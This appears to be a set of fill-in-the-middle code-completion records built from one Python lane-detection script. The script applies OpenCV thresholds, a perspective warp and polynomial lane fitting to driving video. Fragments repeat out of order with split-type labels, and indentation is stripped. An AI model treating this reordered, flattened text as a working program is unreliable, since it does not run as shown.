#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size,flags=cv2.INTER_LINEAR)
#Testing
output4 = np.dstack([warped*255,warped*255,warped*255])
output4 = cv2.resize(output4,(320, 180), interpolation = cv2.INTER_AREA)
#Testing ends
output3 = cv2.warpPerspective(final_img,M,img_size,flags=cv2.INTER_LINEAR)
output3 = cv2.resize(output3,(320, 180), interpolation = cv2.INTER_AREA)
#Testing
#cv2.imshow('warped',warped*255)
kernel = np.ones((320, 1),np.uint8)
warped1 = cv2.morphologyEx(warped.astype(np.uint8), cv2.MORPH_DILATE, kernel, iterations = 1)
warped = cv2.morphologyEx(warped1.astype(np.uint8), cv2.MORPH_ERODE, kernel, iterations = 1)
#cv2.imshow('warped1',warped*255)
#Testing ends
if((len(left_fit)==0 or len(right_fit)==0) or count==100 or validation_fails>5):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
validation_fails = 0
else:
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,False)
if(len(leftx)==0 or len(rightx)==0):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
ploty = np.linspace(0,warped.shape[0]-1,warped.shape[0])
left_fit = np.polyfit(lefty,leftx,2)
right_fit = np.polyfit(righty,rightx,2)
#Testing
t2 = right_fit[2]/left_fit[2]
t1 = right_fit[1]/left_fit[1]
t0 = right_fit[0]/left_fit[0]
#print(t2,t1,t0)
if(abs(t2) >20 or abs(t1)>20 or abs(t0)>20):
validation_fails+=1
if(len(prev_left_fit)!=0):
left_fit = prev_left_fit
if(len(prev_right_fit)!=0):
right_fit = prev_right_fit
print('valid fails')
prev_left_fit = np.copy(left_fit)
prev_right_fit = np.copy(right_fit)
#Testing ends
try:
leftfitx = left_fit[0]*ploty**2 + left_fit[1]*ploty+left_fit[2]
rightfitx = right_fit[0]*ploty**2+right_fit[1]*ploty+right_fit[2]
except TypeError:
print('The function failed to fit a line!')
final_out_img = np.copy(out_img).astype(np.uint8)
#testing
out_img[lefty,leftx] = [255,0,0]
out_img[righty,rightx] = [0,0,255]
#output4 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
leftpoints_draw = (np.asarray([leftfitx,ploty]).T).astype(np.int32)
rightpoints_draw = (np.asarray([rightfitx,ploty]).T).astype(np.int32)
#testing
# width = abs(np.max(leftpoints_draw) - np.max(rightpoints_draw))
# print(width)
cv2.polylines(out_img,[leftpoints_draw],False,(0,255,255),3)
cv2.polylines(out_img,[rightpoints_draw],False,(0,255,255),3)
#testing ends
#**Drwaing on image the lane**
pts_left = np.array([np.transpose(np.vstack([leftfitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([rightfitx, ploty])))])
#flipud is just reversing the order of the points which are from top to bottom to make them bottom to top so that we can have an anticlockwise ordering of the corners.
pts = np.hstack((pts_left, pts_right))
#print(pts.shape)
#Testing
left_side_points_mean = np.mean(pts_left)
right_side_points_mean = np.mean(pts_right)
#Testing ends
#**Measuring Curvature radius**
y_eval = np.max(ploty)
ym_per_pixel = 30/720 #meters per pixel in y dimension
xm_per_pixel = 3.7/700 #meters per pixel in x dimension
#Testing
left_fit_0_metres = left_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
left_fit_1_metres = left_fit[1] * (xm_per_pixel / ym_per_pixel)
right_fit_0_metres = right_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
right_fit_1_metres = right_fit[1] * (xm_per_pixel / ym_per_pixel)
#Testing ends
left_curved = ((1 + (2*left_fit_0_metres*y_eval*ym_per_pixel + left_fit_1_metres)**2)**1.5)/(np.absolute(2*left_fit_0_metres))
right_curved = ((1 + (2*right_fit_0_metres*y_eval*ym_per_pixel + right_fit_1_metres)**2)**1.5)/(np.absolute(2*right_fit_0_metres))
#print('left_curved: '+str(left_curved))
#print('right_curved: '+str(right_curved))
#testing
output2 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
cv2.fillPoly(final_out_img,np.int_([pts]),(0,255,0))
#cv2.imwrite('./test_images/test.jpg',combined*255)
newwarp = cv2.warpPerspective(final_out_img, Minv, (image.shape[1], image.shape[0]))
result = cv2.addWeighted(final_img, 1, newwarp, 0.3, 0)
vis = np.zeros((720, 1280 ,3),dtype=np.uint8)
vis[:720, :1280,:] = result
ltext = "left Curvature(m): " + str(round(left_curved,3))
rtext = "right Curvature(m): " + str(round(right_curved,3))
cent_out = round((left_side_points_mean + right_side_points_mean)/2,3)
distance_from_center = round(abs(img_size[0]/2 - cent_out)*xm_per_pixel,3)
cent = "Vehicle is left from center(m): " + str(distance_from_center)
cv2.putText(result,ltext,(200,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,rtext,(750,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,cent,(350,200),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
#cv2.imshow('result',result)
output1 = cv2.resize(combined*255,(320, 180), interpolation = cv2.INTER_AREA)
vis[:180, 0:320,:] = np.dstack([output1,output1,output1])
vis[:180, 320:640,:] = output2
vis[:180, 640:960,:] = output3
vis[:180, 960:1280,:] = output4
cv2.putText(vis,ltext,(200,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,rtext,(750,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,cent,(350,250),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.imshow('result',vis)
result1.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
result1.release()
cv2.destroyAllWindows() | random_line_split |
|
Pipeline_for_videos.py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 11 09:43:43 2020
@author: Admin
"""
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import pickle
from moviepy.editor import *
fin=[]
out = np.arange(0,250)/250
#print(out.shape)
out1= np.ones(100)
#print(out1.shape)
out2=np.arange(400,350,-1)/400
#print(out2.shape)
out3=np.zeros(400)
#print(out3.shape)
out4=np.arange(800,850,1)/850
#print(out4.shape)
out5=np.ones(100)
#print(out5.shape)
out6 = np.arange(1100,950,-1)/1100
out7=np.zeros(180)
fin = np.concatenate((out, out1, out2,out3,out4,out5,out6,out7))
fin = np.expand_dims(fin,axis=1)
def abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):
# Calculate directional gradient
# Apply threshold
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
if orient=='x':
sobel = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
else:
sobel = cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
absolute = np.absolute(sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
grad_binary = np.zeros_like(scaled)
grad_binary[(scaled >= thresh[0])&(scaled <= thresh[1])] = 1
return grad_binary
def mag_thresh(image, sobel_kernel=3, mag_thresh=(0, 255)):
# Calculate gradient magnitude
# Apply threshold
|
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size,flags=cv2.INTER_LINEAR)
#Testing
output4 = np.dstack([warped*255,warped*255,warped*255])
output4 = cv2.resize(output4,(320, 180), interpolation = cv2.INTER_AREA)
#Testing ends
output3 = cv2.warpPerspective(final_img,M,img_size,flags=cv2.INTER_LINEAR)
output3 = cv2.resize(output3,(320, 180), interpolation = cv2.INTER_AREA)
#Testing
#cv2.imshow('warped',warped*255)
kernel = np.ones((320, 1),np.uint8)
warped1 = cv2.morphologyEx(warped.astype(np.uint8), cv2.MORPH_DILATE, kernel, iterations = 1)
warped = cv2.morphologyEx(warped1.astype(np.uint8), cv2.MORPH_ERODE, kernel, iterations = 1)
#cv2.imshow('warped1',warped*255)
#Testing ends
if((len(left_fit)==0 or len(right_fit)==0) or count==100 or validation_fails>5):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
validation_fails = 0
else:
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,False)
if(len(leftx)==0 or len(rightx)==0):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
ploty = np.linspace(0,warped.shape[0]-1,warped.shape[0])
left_fit = np.polyfit(lefty,leftx,2)
right_fit = np.polyfit(righty,rightx,2)
#Testing
t2 = right_fit[2]/left_fit[2]
t1 = right_fit[1]/left_fit[1]
t0 = right_fit[0]/left_fit[0]
#print(t2,t1,t0)
if(abs(t2) >20 or abs(t1)>20 or abs(t0)>20):
validation_fails+=1
if(len(prev_left_fit)!=0):
left_fit = prev_left_fit
if(len(prev_right_fit)!=0):
right_fit = prev_right_fit
print('valid fails')
prev_left_fit = np.copy(left_fit)
prev_right_fit = np.copy(right_fit)
#Testing ends
try:
leftfitx = left_fit[0]*ploty**2 + left_fit[1]*ploty+left_fit[2]
rightfitx = right_fit[0]*ploty**2+right_fit[1]*ploty+right_fit[2]
except TypeError:
print('The function failed to fit a line!')
final_out_img = np.copy(out_img).astype(np.uint8)
#testing
out_img[lefty,leftx] = [255,0,0]
out_img[righty,rightx] = [0,0,255]
#output4 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
leftpoints_draw = (np.asarray([leftfitx,ploty]).T).astype(np.int32)
rightpoints_draw = (np.asarray([rightfitx,ploty]).T).astype(np.int32)
#testing
# width = abs(np.max(leftpoints_draw) - np.max(rightpoints_draw))
# print(width)
cv2.polylines(out_img,[leftpoints_draw],False,(0,255,255),3)
cv2.polylines(out_img,[rightpoints_draw],False,(0,255,255),3)
#testing ends
#**Drwaing on image the lane**
pts_left = np.array([np.transpose(np.vstack([leftfitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([rightfitx, ploty])))])
#flipud is just reversing the order of the points which are from top to bottom to make them bottom to top so that we can have an anticlockwise ordering of the corners.
pts = np.hstack((pts_left, pts_right))
#print(pts.shape)
#Testing
left_side_points_mean = np.mean(pts_left)
right_side_points_mean = np.mean(pts_right)
#Testing ends
#**Measuring Curvature radius**
y_eval = np.max(ploty)
ym_per_pixel = 30/720 #meters per pixel in y dimension
xm_per_pixel = 3.7/700 #meters per pixel in x dimension
#Testing
left_fit_0_metres = left_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
left_fit_1_metres = left_fit[1] * (xm_per_pixel / ym_per_pixel)
right_fit_0_metres = right_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
right_fit_1_metres = right_fit[1] * (xm_per_pixel / ym_per_pixel)
#Testing ends
left_curved = ((1 + (2*left_fit_0_metres*y_eval*ym_per_pixel + left_fit_1_metres)**2)**1.5)/(np.absolute(2*left_fit_0_metres))
right_curved = ((1 + (2*right_fit_0_metres*y_eval*ym_per_pixel + right_fit_1_metres)**2)**1.5)/(np.absolute(2*right_fit_0_metres))
#print('left_curved: '+str(left_curved))
#print('right_curved: '+str(right_curved))
#testing
output2 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
cv2.fillPoly(final_out_img,np.int_([pts]),(0,255,0))
#cv2.imwrite('./test_images/test.jpg',combined*255)
newwarp = cv2.warpPerspective(final_out_img, Minv, (image.shape[1], image.shape[0]))
result = cv2.addWeighted(final_img, 1, newwarp, 0.3, 0)
vis = np.zeros((720, 1280 ,3),dtype=np.uint8)
vis[:720, :1280,:] = result
ltext = "left Curvature(m): " + str(round(left_curved,3))
rtext = "right Curvature(m): " + str(round(right_curved,3))
cent_out = round((left_side_points_mean + right_side_points_mean)/2,3)
distance_from_center = round(abs(img_size[0]/2 - cent_out)*xm_per_pixel,3)
cent = "Vehicle is left from center(m): " + str(distance_from_center)
cv2.putText(result,ltext,(200,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,rtext,(750,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,cent,(350,200),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
#cv2.imshow('result',result)
output1 = cv2.resize(combined*255,(320, 180), interpolation = cv2.INTER_AREA)
vis[:180, 0:320,:] = np.dstack([output1,output1,output1])
vis[:180, 320:640,:] = output2
vis[:180, 640:960,:] = output3
vis[:180, 960:1280,:] = output4
cv2.putText(vis,ltext,(200,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,rtext,(750,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,cent,(350,250),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.imshow('result',vis)
result1.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
result1.release()
cv2.destroyAllWindows() | gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary | identifier_body |
Pipeline_for_videos.py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 11 09:43:43 2020
@author: Admin
"""
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import pickle
from moviepy.editor import *
fin=[]
out = np.arange(0,250)/250
#print(out.shape)
out1= np.ones(100)
#print(out1.shape)
out2=np.arange(400,350,-1)/400
#print(out2.shape)
out3=np.zeros(400)
#print(out3.shape)
out4=np.arange(800,850,1)/850
#print(out4.shape)
out5=np.ones(100)
#print(out5.shape)
out6 = np.arange(1100,950,-1)/1100
out7=np.zeros(180)
fin = np.concatenate((out, out1, out2,out3,out4,out5,out6,out7))
fin = np.expand_dims(fin,axis=1)
def abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):
# Calculate directional gradient
# Apply threshold
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
if orient=='x':
sobel = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
else:
sobel = cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
absolute = np.absolute(sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
grad_binary = np.zeros_like(scaled)
grad_binary[(scaled >= thresh[0])&(scaled <= thresh[1])] = 1
return grad_binary
def | (image, sobel_kernel=3, mag_thresh=(0, 255)):
# Calculate gradient magnitude
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
